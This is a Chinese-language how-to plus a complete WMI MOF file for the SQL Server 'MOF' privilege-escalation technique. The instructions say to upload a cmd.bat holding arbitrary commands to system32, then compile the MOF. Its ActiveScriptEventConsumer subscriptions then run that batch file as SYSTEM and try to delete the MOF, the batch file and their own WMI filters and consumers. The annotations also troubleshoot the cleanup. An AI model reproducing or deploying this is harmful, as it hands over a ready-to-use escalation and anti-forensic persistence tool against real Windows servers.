这个 SQL 提权用的 MOF 只会运行 system32 目录下的文件，不能自行指定路径：负责执行的消费者脚本里写死的是不带目录的 `s.Run("cmd.bat")`，后面的清理脚本删除的也是同名的 `cmd.bat`。因此需要先把要执行的命令写入 cmd.bat，上传到 system32 目录，然后再执行（编译）这个 MOF。
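// WMI event-subscription MOF (fed to mofcomp, or dropped into the wbem\mof
// auto-compile directory on the older Windows builds that still have one).
// It creates two __EventFilter / consumer / __FilterToConsumerBinding sets:
// one runs cmd.bat, the other tries to clean up afterwards. These three
// object types are the standard WMI-subscription artefacts defenders look
// for. Everything below is compiled into root\cimv2.
#pragma namespace("\\\\.\\root\\cimv2")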
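// Trigger class. It carries no data of its own; creating an instance of it
// (the last declaration in this file) raises the __InstanceCreationEvent that
// filter "instfilt" matches, which is what fires the payload consumer "ASEC".
class MyClass547
{
    [key] string Name;
};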
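// Consumer class plus the provider registration that backs it.
// ActiveScriptEventConsumer runs the inline ScriptText in the named
// ScriptingEngine each time a bound filter fires.
class ActiveScriptEventConsumer : __EventConsumer
{
    [key] string Name;
    [not_null] string ScriptingEngine;
    string ScriptFileName;
    [template] string ScriptText;
    uint32 KillTimeout;
};

// Provider registration for the class above. The CLSID is presumably the
// stock script-consumer COM server (as in scrcons.mof) — verify against the
// target; nothing in this block is specific to the payload.
// Note: neither cleanup script in this file deletes this registration or the
// provider instance, so both outlive the payload.
instance of __Win32Provider as $P
{
    Name = "ActiveScriptEventConsumer";
    CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
    PerUserInitialization = TRUE;
};

instance of __EventConsumerProviderRegistration
{
    Provider = $P;
    ConsumerClassNames = {"ActiveScriptEventConsumer"};
};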
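// Payload consumer "ASEC": fired by filter "instfilt" when the MyClass547
// instance at the end of this file is created.
//
// The JScript (a) launches "cmd.bat" through WScript.Shell — by bare file
// name, so it resolves against the working directory of the process hosting
// the script (the accompanying notes say that is system32; put the batch
// file there or change the string to an absolute path) — and then
// (b) removes its own trigger: the MyClass547 class, filter "instfilt" and
// this consumer. Every step sits in an empty catch, so failures are silent.
// The __FilterToConsumerBinding that points at this consumer is not deleted
// explicitly here.
instance of ActiveScriptEventConsumer as $cons
{
    Name = "ASEC";
    ScriptingEngine = "JScript";
    ScriptText =
        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
};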
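// Cleanup consumer "qndASEC": bound to filter "qndfilt" below. It deletes
// the compiled copy of this MOF, then the batch file, then its own filter
// and consumer. Both file paths are relative (like "cmd.bat" in the payload
// script) and the .mof name is hard-coded: the uploaded file must be called
// hBsBa.mof or the first delete silently fails — every failure here is
// swallowed by an empty catch. The two __FilterToConsumerBinding instances
// and the provider registration are not deleted explicitly by either script.
instance of ActiveScriptEventConsumer as $cons2
{
    Name = "qndASEC";
    ScriptingEngine = "JScript";
    ScriptText =
        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
};

// Payload trigger: matches the creation of any MyClass547 instance, i.e. the
// last declaration in this file being compiled.
instance of __EventFilter as $Filt
{
    Name = "instfilt";
    Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";
    QueryLanguage = "WQL";
};

// Cleanup trigger: polls once a second (WITHIN 1) for a Win32_Process named
// "cmd.bat" going away.
// NOTE(review): Win32_Process.Name is the executable image name, and a batch
// file runs inside cmd.exe, so a process literally named "cmd.bat" is not
// expected to exist and this filter will likely never fire — confirm on a
// target before relying on the cleanup. If it never matches, hBsBa.mof,
// cmd.bat, "qndfilt" and "qndASEC" all remain on the host.
instance of __EventFilter as $Filt2
{
    Name = "qndfilt";
    Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";
    QueryLanguage = "WQL";
};

// Filter -> consumer wiring; a consumer only runs through a binding.
instance of __FilterToConsumerBinding as $bind
{
    Consumer = $cons;
    Filter = $Filt;
};

instance of __FilterToConsumerBinding as $bind2
{
    Consumer = $cons2;
    Filter = $Filt2;
};

// Creating this instance raises the __InstanceCreationEvent that "instfilt"
// matches, so the payload is meant to run as soon as the MOF is compiled.
// The Name value itself is arbitrary.
instance of MyClass547 as $MyClass
{
    Name = "ClassConsumer";
};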